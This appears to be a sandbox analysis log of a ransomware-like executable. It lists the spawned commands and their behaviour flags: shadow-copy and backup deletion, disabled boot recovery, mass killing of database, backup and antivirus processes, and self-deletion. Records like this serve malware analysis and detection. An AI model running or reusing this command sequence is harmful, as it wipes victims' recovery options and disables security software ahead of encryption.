- "C:\Users\Admin\AppData\Local\Temp\build-x32.crypt.bin.exe" (C:\Users\Admin\AppData\Local\Temp\build-x32.crypt.bin.exe, PID:1124): Suspicious behavior: EnumeratesProcesses; Modifies extensions of user files; Sets desktop wallpaper using registry; NTFS ADS; Suspicious use of WriteProcessMemory
  - cmd /C wmic.exe SHADOWCOPY DELETE /nointeractive (C:\Windows\SysWOW64\cmd.exe, PID:1312): Suspicious use of WriteProcessMemory
    - wmic.exe SHADOWCOPY DELETE /nointeractive (C:\Windows\SysWOW64\Wbem\WMIC.exe, PID:1476): Suspicious use of AdjustPrivilegeToken
  - cmd /C wbadmin DELETE SYSTEMSTATEBACKUP (C:\Windows\SysWOW64\cmd.exe, PID:1096)
  - cmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest (C:\Windows\SysWOW64\cmd.exe, PID:1536)
  - cmd /C bcdedit.exe /set {default} recoveryenabled No (C:\Windows\SysWOW64\cmd.exe, PID:1720)
  - cmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures (C:\Windows\SysWOW64\cmd.exe, PID:1824)
  - cmd /C vssadmin.exe Delete Shadows /All /Quiet (C:\Windows\SysWOW64\cmd.exe, PID:1808): Suspicious use of WriteProcessMemory
    - vssadmin.exe Delete Shadows /All /Quiet (C:\Windows\SysWOW64\vssadmin.exe, PID:1816): Interacts with shadow copies
  - cmd /C C:\Windows\system32\vssvc.exe (C:\Windows\SysWOW64\cmd.exe, PID:1660)
  - cmd /C taskkill /F /T /IM wxServer* (C:\Windows\SysWOW64\cmd.exe, PID:1608): Suspicious use of WriteProcessMemory
    - taskkill /F /T /IM wxServer* (C:\Windows\SysWOW64\taskkill.exe, PID:1644): Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM QBFCService* (C:\Windows\SysWOW64\cmd.exe, PID:1868): Suspicious use of WriteProcessMemory
    - taskkill /F /T /IM QBFCService* (C:\Windows\SysWOW64\taskkill.exe, PID:1948): Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM QBVSS* (C:\Windows\SysWOW64\cmd.exe, PID:1972): Suspicious use of WriteProcessMemory
    - taskkill /F /T /IM QBVSS* (C:\Windows\SysWOW64\taskkill.exe, PID:1028): Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM sql* (C:\Windows\SysWOW64\cmd.exe, PID:2020)
    - taskkill /F /T /IM sql* (C:\Windows\SysWOW64\taskkill.exe, PID:1500): Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM msaccess* (C:\Windows\SysWOW64\cmd.exe, PID:1432)
    - taskkill /F /T /IM msaccess* (C:\Windows\SysWOW64\taskkill.exe, PID:1092): Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM mssql* (C:\Windows\SysWOW64\cmd.exe, PID:1436)
    - taskkill /F /T /IM mssql* (C:\Windows\SysWOW64\taskkill.exe, PID:1108): Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM mysql* (C:\Windows\SysWOW64\cmd.exe, PID:1512)
    - taskkill /F /T /IM mysql* (C:\Windows\SysWOW64\taskkill.exe, PID:1720): Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM wxServerView* (C:\Windows\SysWOW64\cmd.exe, PID:1792)
    - taskkill /F /T /IM wxServerView* (C:\Windows\SysWOW64\taskkill.exe, PID:1760): Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM sqlmangr* (C:\Windows\SysWOW64\cmd.exe, PID:1600)
    - taskkill /F /T /IM sqlmangr* (C:\Windows\SysWOW64\taskkill.exe, PID:1664): Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM RAgui* (C:\Windows\SysWOW64\cmd.exe, PID:1644)
    - taskkill /F /T /IM RAgui* (C:\Windows\SysWOW64\taskkill.exe, PID:1960): Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM supervise* (C:\Windows\SysWOW64\cmd.exe, PID:1948)
    - taskkill /F /T /IM supervise* (C:\Windows\SysWOW64\taskkill.exe, PID:284): Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM Culture* (C:\Windows\SysWOW64\cmd.exe, PID:1028)
    - taskkill /F /T /IM Culture* (C:\Windows\SysWOW64\taskkill.exe, PID:2008): Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM Defwatch* (C:\Windows\SysWOW64\cmd.exe, PID:1500)
    - taskkill /F /T /IM Defwatch* (C:\Windows\SysWOW64\taskkill.exe, PID:1580): Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM winword* (C:\Windows\SysWOW64\cmd.exe, PID:1092)
    - taskkill /F /T /IM winword* (C:\Windows\SysWOW64\taskkill.exe, PID:1548): Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM QBW32* (C:\Windows\SysWOW64\cmd.exe, PID:1108)
    - taskkill /F /T /IM QBW32* (C:\Windows\SysWOW64\taskkill.exe, PID:1828): Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM QBDBMgr* (C:\Windows\SysWOW64\cmd.exe, PID:1720)
    - taskkill /F /T /IM QBDBMgr* (C:\Windows\SysWOW64\taskkill.exe, PID:1764): Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM qbupdate* (C:\Windows\SysWOW64\cmd.exe, PID:1760)
    - taskkill /F /T /IM qbupdate* (C:\Windows\SysWOW64\taskkill.exe, PID:1592): Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM axlbridge* (C:\Windows\SysWOW64\cmd.exe, PID:1664)
    - taskkill /F /T /IM axlbridge* (C:\Windows\SysWOW64\taskkill.exe, PID:1656): Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM httpd* (C:\Windows\SysWOW64\cmd.exe, PID:1960)
    - taskkill /F /T /IM httpd* (C:\Windows\SysWOW64\taskkill.exe, PID:1968): Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM fdlauncher* (C:\Windows\SysWOW64\cmd.exe, PID:284)
    - taskkill /F /T /IM fdlauncher* (C:\Windows\SysWOW64\taskkill.exe, PID:2040): Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM MsDtSrvr* (C:\Windows\SysWOW64\cmd.exe, PID:2008)
    - taskkill /F /T /IM MsDtSrvr* (C:\Windows\SysWOW64\taskkill.exe, PID:2024): Suspicious use of AdjustPrivilegeToken
  - cmd /C taskkill /F /T /IM java* (C:\Windows\SysWOW64\cmd.exe, PID:1580)
    - taskkill /F /T /IM java* (C:\Windows\SysWOW64\taskkill.exe, PID:292)
  - cmd /C taskkill /F /T /IM 360se* (C:\Windows\SysWOW64\cmd.exe, PID:1548)
    - taskkill /F /T /IM 360se* (C:\Windows\SysWOW64\taskkill.exe, PID:1088)
  - cmd /C taskkill /F /T /IM 360doctor* (C:\Windows\SysWOW64\cmd.exe, PID:1828)
    - taskkill /F /T /IM 360doctor* (C:\Windows\SysWOW64\taskkill.exe, PID:1512)
  - cmd /C taskkill /F /T /IM wdswfsafe* (C:\Windows\SysWOW64\cmd.exe, PID:1764)
    - taskkill /F /T /IM wdswfsafe* (C:\Windows\SysWOW64\taskkill.exe, PID:1856): Kills process with taskkill
  - cmd /C taskkill /F /T /IM fdhost* (C:\Windows\SysWOW64\cmd.exe, PID:1592)
    - taskkill /F /T /IM fdhost* (C:\Windows\SysWOW64\taskkill.exe, PID:1604): Kills process with taskkill
  - cmd /C taskkill /F /T /IM GDscan* (C:\Windows\SysWOW64\cmd.exe, PID:1656)
    - taskkill /F /T /IM GDscan* (C:\Windows\SysWOW64\taskkill.exe, PID:1608): Kills process with taskkill
  - cmd /C taskkill /F /T /IM ZhuDongFangYu* (C:\Windows\SysWOW64\cmd.exe, PID:1968)
    - taskkill /F /T /IM ZhuDongFangYu* (C:\Windows\SysWOW64\taskkill.exe, PID:1940): Kills process with taskkill
  - cmd /C taskkill /F /T /IM QBDBMgrN* (C:\Windows\SysWOW64\cmd.exe, PID:2040)
    - taskkill /F /T /IM QBDBMgrN* (C:\Windows\SysWOW64\taskkill.exe, PID:1028)
  - cmd /C taskkill /F /T /IM mysqld* (C:\Windows\SysWOW64\cmd.exe, PID:2024)
    - taskkill /F /T /IM mysqld* (C:\Windows\SysWOW64\taskkill.exe, PID:1212): Kills process with taskkill
  - cmd /C taskkill /F /T /IM AutodeskDesktopApp* (C:\Windows\SysWOW64\cmd.exe, PID:292)
    - taskkill /F /T /IM AutodeskDesktopApp* (C:\Windows\SysWOW64\taskkill.exe, PID:1616): Kills process with taskkill
  - cmd /C taskkill /F /T /IM acwebbrowser* (C:\Windows\SysWOW64\cmd.exe, PID:1088)
    - taskkill /F /T /IM acwebbrowser* (C:\Windows\SysWOW64\taskkill.exe, PID:1544): Kills process with taskkill
  - cmd /C taskkill /F /T /IM Creative Cloud* (C:\Windows\SysWOW64\cmd.exe, PID:1512)
    - taskkill /F /T /IM Creative Cloud* (C:\Windows\SysWOW64\taskkill.exe, PID:1396): Kills process with taskkill
  - cmd /C taskkill /F /T /IM Adobe Desktop Service* (C:\Windows\SysWOW64\cmd.exe, PID:1636)
    - taskkill /F /T /IM Adobe Desktop Service* (C:\Windows\SysWOW64\taskkill.exe, PID:1764): Kills process with taskkill
  - cmd /C taskkill /F /T /IM CoreSync* (C:\Windows\SysWOW64\cmd.exe, PID:1852)
    - taskkill /F /T /IM CoreSync* (C:\Windows\SysWOW64\taskkill.exe, PID:1956): Kills process with taskkill
  - cmd /C taskkill /F /T /IM Adobe CEF Helper* (C:\Windows\SysWOW64\cmd.exe, PID:1652)
    - taskkill /F /T /IM Adobe CEF Helper* (C:\Windows\SysWOW64\taskkill.exe, PID:1988)
  - cmd /C taskkill /F /T /IM node* (C:\Windows\SysWOW64\cmd.exe, PID:1656)
    - taskkill /F /T /IM node* (C:\Windows\SysWOW64\taskkill.exe, PID:1568): Kills process with taskkill
  - cmd /C taskkill /F /T /IM AdobeIPCBroker* (C:\Windows\SysWOW64\cmd.exe, PID:1968)
    - taskkill /F /T /IM AdobeIPCBroker* (C:\Windows\SysWOW64\taskkill.exe, PID:1524)
  - cmd /C taskkill /F /T /IM sync-taskbar* (C:\Windows\SysWOW64\cmd.exe, PID:1936)
    - taskkill /F /T /IM sync-taskbar* (C:\Windows\SysWOW64\taskkill.exe, PID:1536): Kills process with taskkill
  - cmd /C taskkill /F /T /IM sync-worker* (C:\Windows\SysWOW64\cmd.exe, PID:2012)
    - taskkill /F /T /IM sync-worker* (C:\Windows\SysWOW64\taskkill.exe, PID:656): Kills process with taskkill
  - cmd /C taskkill /F /T /IM InputPersonalization* (C:\Windows\SysWOW64\cmd.exe, PID:1836)
    - taskkill /F /T /IM InputPersonalization* (C:\Windows\SysWOW64\taskkill.exe, PID:1432): Kills process with taskkill
  - cmd /C taskkill /F /T /IM AdobeCollabSync* (C:\Windows\SysWOW64\cmd.exe, PID:1800)
    - taskkill /F /T /IM AdobeCollabSync* (C:\Windows\SysWOW64\taskkill.exe, PID:1088): Kills process with taskkill
  - cmd /C taskkill /F /T /IM BrCtrlCntr* (C:\Windows\SysWOW64\cmd.exe, PID:1396)
    - taskkill /F /T /IM BrCtrlCntr* (C:\Windows\SysWOW64\taskkill.exe, PID:1856): Kills process with taskkill
  - cmd /C taskkill /F /T /IM BrCcUxSys* (C:\Windows\SysWOW64\cmd.exe, PID:1560)
    - taskkill /F /T /IM BrCcUxSys* (C:\Windows\SysWOW64\taskkill.exe, PID:1660): Kills process with taskkill
  - cmd /C taskkill /F /T /IM SimplyConnectionManager* (C:\Windows\SysWOW64\cmd.exe, PID:1924)
    - taskkill /F /T /IM SimplyConnectionManager* (C:\Windows\SysWOW64\taskkill.exe, PID:2036)
  - cmd /C taskkill /F /T /IM Simply.SystemTrayIcon* (C:\Windows\SysWOW64\cmd.exe, PID:884)
    - taskkill /F /T /IM Simply.SystemTrayIcon* (C:\Windows\SysWOW64\taskkill.exe, PID:528): Kills process with taskkill
  - cmd /C taskkill /F /T /IM fbguard* (C:\Windows\SysWOW64\cmd.exe, PID:1672)
    - taskkill /F /T /IM fbguard* (C:\Windows\SysWOW64\taskkill.exe, PID:1440): Kills process with taskkill
  - cmd /C taskkill /F /T /IM fbserver* (C:\Windows\SysWOW64\cmd.exe, PID:2032)
    - taskkill /F /T /IM fbserver* (C:\Windows\SysWOW64\taskkill.exe, PID:1696): Kills process with taskkill
  - cmd /C taskkill /F /T /IM ONENOTEM* (C:\Windows\SysWOW64\cmd.exe, PID:2024)
    - taskkill /F /T /IM ONENOTEM* (C:\Windows\SysWOW64\taskkill.exe, PID:1356): Kills process with taskkill
  - cmd /C taskkill /F /T /IM wrapper* (C:\Windows\SysWOW64\cmd.exe, PID:2020)
    - taskkill /F /T /IM wrapper* (C:\Windows\SysWOW64\taskkill.exe, PID:1076): Kills process with taskkill
  - cmd /C taskkill /F /T /IM DefWatch* (C:\Windows\SysWOW64\cmd.exe, PID:1824)
    - taskkill /F /T /IM DefWatch* (C:\Windows\SysWOW64\taskkill.exe, PID:1544): Kills process with taskkill
  - cmd /C taskkill /F /T /IM ccEvtMgr* (C:\Windows\SysWOW64\cmd.exe, PID:1088)
    - taskkill /F /T /IM ccEvtMgr* (C:\Windows\SysWOW64\taskkill.exe, PID:1820): Kills process with taskkill
  - cmd /C taskkill /F /T /IM ccSetMgr* (C:\Windows\SysWOW64\cmd.exe, PID:1692)
    - taskkill /F /T /IM ccSetMgr* (C:\Windows\SysWOW64\taskkill.exe, PID:1396): Kills process with taskkill
  - cmd /C taskkill /F /T /IM SavRoam* (C:\Windows\SysWOW64\cmd.exe, PID:1956)
    - taskkill /F /T /IM SavRoam* (C:\Windows\SysWOW64\taskkill.exe, PID:1660)
  - cmd /C taskkill /F /T /IM Sqlservr* (C:\Windows\SysWOW64\cmd.exe, PID:1960)
    - taskkill /F /T /IM Sqlservr* (C:\Windows\SysWOW64\taskkill.exe, PID:2036): Kills process with taskkill
  - cmd /C taskkill /F /T /IM sqlagent* (C:\Windows\SysWOW64\cmd.exe, PID:1964)
    - taskkill /F /T /IM sqlagent* (C:\Windows\SysWOW64\taskkill.exe, PID:528): Kills process with taskkill
  - cmd /C taskkill /F /T /IM sqladhlp* (C:\Windows\SysWOW64\cmd.exe, PID:2000)
    - taskkill /F /T /IM sqladhlp* (C:\Windows\SysWOW64\taskkill.exe, PID:1440): Kills process with taskkill
  - cmd /C taskkill /F /T /IM Culserver* (C:\Windows\SysWOW64\cmd.exe, PID:1936)
    - taskkill /F /T /IM Culserver* (C:\Windows\SysWOW64\taskkill.exe, PID:1696): Kills process with taskkill
  - cmd /C taskkill /F /T /IM RTVscan* (C:\Windows\SysWOW64\cmd.exe, PID:2012)
    - taskkill /F /T /IM RTVscan* (C:\Windows\SysWOW64\taskkill.exe, PID:1356)
  - cmd /C taskkill /F /T /IM sqlbrowser* (C:\Windows\SysWOW64\cmd.exe, PID:1432)
    - taskkill /F /T /IM sqlbrowser* (C:\Windows\SysWOW64\taskkill.exe, PID:1076)
  - cmd /C taskkill /F /T /IM SQLADHLP* (C:\Windows\SysWOW64\cmd.exe, PID:1832)
    - taskkill /F /T /IM SQLADHLP* (C:\Windows\SysWOW64\taskkill.exe, PID:1544)
  - cmd /C taskkill /F /T /IM QBIDPService* (C:\Windows\SysWOW64\cmd.exe, PID:1376)
    - taskkill /F /T /IM QBIDPService* (C:\Windows\SysWOW64\taskkill.exe, PID:1760): Kills process with taskkill
  - cmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS* (C:\Windows\SysWOW64\cmd.exe, PID:1812)
    - taskkill /F /T /IM Intuit.QuickBooks.FCS* (C:\Windows\SysWOW64\taskkill.exe, PID:1860): Kills process with taskkill
  - cmd /C taskkill /F /T /IM QBCFMonitorService* (C:\Windows\SysWOW64\cmd.exe, PID:1560)
    - taskkill /F /T /IM QBCFMonitorService* (C:\Windows\SysWOW64\taskkill.exe, PID:1916): Kills process with taskkill
  - cmd /C taskkill /F /T /IM sqlwriter* (C:\Windows\SysWOW64\cmd.exe, PID:1924)
    - taskkill /F /T /IM sqlwriter* (C:\Windows\SysWOW64\taskkill.exe, PID:1648): Kills process with taskkill
  - cmd /C taskkill /F /T /IM msmdsrv* (C:\Windows\SysWOW64\cmd.exe, PID:884)
    - taskkill /F /T /IM msmdsrv* (C:\Windows\SysWOW64\taskkill.exe, PID:432): Kills process with taskkill
  - cmd /C taskkill /F /T /IM tomcat6* (C:\Windows\SysWOW64\cmd.exe, PID:1672)
    - taskkill /F /T /IM tomcat6* (C:\Windows\SysWOW64\taskkill.exe, PID:520)
  - cmd /C taskkill /F /T /IM zhudongfangyu* (C:\Windows\SysWOW64\cmd.exe, PID:2032)
    - taskkill /F /T /IM zhudongfangyu* (C:\Windows\SysWOW64\taskkill.exe, PID:2008): Kills process with taskkill
  - cmd /C taskkill /F /T /IM vmware-usbarbitator64* (C:\Windows\SysWOW64\cmd.exe, PID:1364)
    - taskkill /F /T /IM vmware-usbarbitator64* (C:\Windows\SysWOW64\taskkill.exe, PID:1580): Kills process with taskkill
  - cmd /C taskkill /F /T /IM vmware-converter* (C:\Windows\SysWOW64\cmd.exe, PID:1548)
    - taskkill /F /T /IM vmware-converter* (C:\Windows\SysWOW64\taskkill.exe, PID:1128): Kills process with taskkill
  - cmd /C taskkill /F /T /IM dbsrv12* (C:\Windows\SysWOW64\cmd.exe, PID:1108)
    - taskkill /F /T /IM dbsrv12* (C:\Windows\SysWOW64\taskkill.exe, PID:1584): Kills process with taskkill
  - cmd /C taskkill /F /T /IM dbeng8* (C:\Windows\SysWOW64\cmd.exe, PID:1368)
    - taskkill /F /T /IM dbeng8* (C:\Windows\SysWOW64\taskkill.exe, PID:316): Kills process with taskkill
  - cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID* (C:\Windows\SysWOW64\cmd.exe, PID:1592)
    - taskkill /F /T /IM MSSQL$MICROSOFT##WID* (C:\Windows\SysWOW64\taskkill.exe, PID:1668): Kills process with taskkill
  - cmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012* (C:\Windows\SysWOW64\cmd.exe, PID:2044)
    - taskkill /F /T /IM MSSQL$VEEAMSQL2012* (C:\Windows\SysWOW64\taskkill.exe, PID:1852): Kills process with taskkill
  - cmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012* (C:\Windows\SysWOW64\cmd.exe, PID:1508)
    - taskkill /F /T /IM SQLAgent$VEEAMSQL2012* (C:\Windows\SysWOW64\taskkill.exe, PID:2036): Kills process with taskkill
  - cmd /C taskkill /F /T /IM SQLBrowser* (C:\Windows\SysWOW64\cmd.exe, PID:1520)
    - taskkill /F /T /IM SQLBrowser* (C:\Windows\SysWOW64\taskkill.exe, PID:1964): Kills process with taskkill
  - cmd /C taskkill /F /T /IM SQLWriter* (C:\Windows\SysWOW64\cmd.exe, PID:1712)
    - taskkill /F /T /IM SQLWriter* (C:\Windows\SysWOW64\taskkill.exe, PID:1440): Kills process with taskkill
  - cmd /C taskkill /F /T /IM FishbowlMySQL* (C:\Windows\SysWOW64\cmd.exe, PID:1392)
    - taskkill /F /T /IM FishbowlMySQL* (C:\Windows\SysWOW64\taskkill.exe, PID:1536): Kills process with taskkill
  - cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID* (C:\Windows\SysWOW64\cmd.exe, PID:2024)
    - taskkill /F /T /IM MSSQL$MICROSOFT##WID* (C:\Windows\SysWOW64\taskkill.exe, PID:668): Kills process with taskkill
  - cmd /C taskkill /F /T /IM MySQL57* (C:\Windows\SysWOW64\cmd.exe, PID:2020)
    - taskkill /F /T /IM MySQL57* (C:\Windows\SysWOW64\taskkill.exe, PID:576)
  - cmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT* (C:\Windows\SysWOW64\cmd.exe, PID:1824)
    - taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT* (C:\Windows\SysWOW64\taskkill.exe, PID:1828)
  - cmd /C taskkill /F /T /IM MSSQLServerADHelper100* (C:\Windows\SysWOW64\cmd.exe, PID:1512)
    - taskkill /F /T /IM MSSQLServerADHelper100* (C:\Windows\SysWOW64\taskkill.exe, PID:1760): Kills process with taskkill
  - cmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT* (C:\Windows\SysWOW64\cmd.exe, PID:1720)
    - taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT* (C:\Windows\SysWOW64\taskkill.exe, PID:1860): Kills process with taskkill
  - cmd /C taskkill /F /T /IM msftesql-Exchange* (C:\Windows\SysWOW64\cmd.exe, PID:1784)
    - taskkill /F /T /IM msftesql-Exchange* (C:\Windows\SysWOW64\taskkill.exe, PID:1916): Kills process with taskkill
  - cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE* (C:\Windows\SysWOW64\cmd.exe, PID:1988)
    - taskkill /F /T /IM MSSQL$MICROSOFT##SSEE* (C:\Windows\SysWOW64\taskkill.exe, PID:1648)
  - cmd /C taskkill /F /T /IM MSSQL$SBSMONITORING* (C:\Windows\SysWOW64\cmd.exe, PID:1656)
    - taskkill /F /T /IM MSSQL$SBSMONITORING* (C:\Windows\SysWOW64\taskkill.exe, PID:432): Kills process with taskkill
  - cmd /C taskkill /F /T /IM MSSQL$SHAREPOINT* (C:\Windows\SysWOW64\cmd.exe, PID:284)
    - taskkill /F /T /IM MSSQL$SHAREPOINT* (C:\Windows\SysWOW64\taskkill.exe, PID:520)
  - cmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING* (C:\Windows\SysWOW64\cmd.exe, PID:1540)
    - taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING* (C:\Windows\SysWOW64\taskkill.exe, PID:2008): Kills process with taskkill
  - cmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT* (C:\Windows\SysWOW64\cmd.exe, PID:1352)
    - taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT* (C:\Windows\SysWOW64\taskkill.exe, PID:1580): Kills process with taskkill
  - cmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING* (C:\Windows\SysWOW64\cmd.exe, PID:1616)
    - taskkill /F /T /IM SQLAgent$SBSMONITORING* (C:\Windows\SysWOW64\taskkill.exe, PID:1128): Kills process with taskkill
  - cmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT* (C:\Windows\SysWOW64\cmd.exe, PID:1836)
    - taskkill /F /T /IM SQLAgent$SHAREPOINT* (C:\Windows\SysWOW64\taskkill.exe, PID:1584): Kills process with taskkill
  - "C:\Windows\System32\cmd.exe" /C timeout /T 15 /NOBREAK && del "C:\Users\Admin\AppData\Local\Temp\build-x32.crypt.bin.exe" /F (C:\Windows\SysWOW64\cmd.exe, PID:292): Deletes itself
    - timeout /T 15 /NOBREAK (C:\Windows\SysWOW64\timeout.exe, PID:792): Delays execution with timeout.exe
- C:\Windows\system32\vssvc.exe (C:\Windows\system32\vssvc.exe, PID:744): Modifies service; Suspicious use of AdjustPrivilegeToken